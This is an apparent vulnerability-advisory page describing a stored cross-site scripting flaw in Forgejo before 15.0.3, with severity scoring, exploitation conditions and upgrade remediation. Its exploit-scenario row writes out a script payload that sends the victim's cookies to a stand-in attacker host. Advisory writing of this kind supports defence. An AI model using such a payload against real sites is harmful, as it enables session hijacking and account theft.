Severity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
AC:H reflects non-default DEFAULT_SHOW_FULL_NAME prerequisite; PR:L for authenticated attacker; S:C and C:L/I:L for cross-user browser impact.
Primary rating from Vendor (VulnCheck).
CVSS VectorVendor: VulnCheck
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionCVE.org
Forgejo before 15.0.3 contains a stored cross-site scripting vulnerability that allows authenticated attackers to execute arbitrary JavaScript in other users' browsers by setting a full name containing an HTML payload and triggering an Actions run. When the DEFAULT_SHOW_FULL_NAME option is enabled, the run description is assembled server-side with the user's display name interpolated into an HTML string via a translation function that does not escape its arguments, and the frontend renders the result using a Vue v-html binding, causing script execution for any user who views the affected Actions run page.
AnalysisAI
Stored XSS in Forgejo before 15.0.3 allows authenticated users to execute arbitrary JavaScript in other users' browsers by embedding an HTML payload in their display name and triggering a CI/CD Actions run. The vulnerability exists because the server-side run description assembles HTML by interpolating the user's full name through a translation function that performs no output encoding, and the frontend renders this server-generated markup via a Vue v-html binding - a classic sink for stored XSS. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires three concurrent conditions: (1) the Forgejo instance must have the DEFAULT_SHOW_FULL_NAME option enabled in its configuration - this is explicitly a non-default setting, so the majority of default deployments are not vulnerable; (2) the attacker must hold a valid low-privilege user account on the target Forgejo instance (PR:L), as account registration or social engineering is a prerequisite; (3) the attacker must be able to trigger a Forgejo Actions run, which requires write access to at least one repository with an Actions workflow configured. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Real-world risk is moderate-to-low, heavily conditional on deployment configuration. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An authenticated Forgejo user sets their account full name to a JavaScript payload such as '<script>document.location="https://attacker.example/steal?c="+document.cookie</script>' via the profile settings page. The attacker then triggers any Forgejo Actions run (e.g., pushing a commit to a repository with an Actions workflow). … |
| Remediation | The primary fix is to upgrade to Forgejo 15.0.3 or later, as documented at https://codeberg.org/forgejo/forgejo/src/branch/forgejo/release-notes-published/15.0.3.md. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
In Forgejo before 1.20.5-1, certain endpoints do not check whether an object belongs to a repository for which permissio
Forgejo before 1.20.5-1 allows 2FA bypass when docker login uses Basic Authentication. Rated high severity (CVSS 7.5), t
Forgejo before 1.20.5-1 allows remote attackers to test for the existence of private user accounts by appending .rss (or
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-41433
GHSA-r26p-rw8p-x468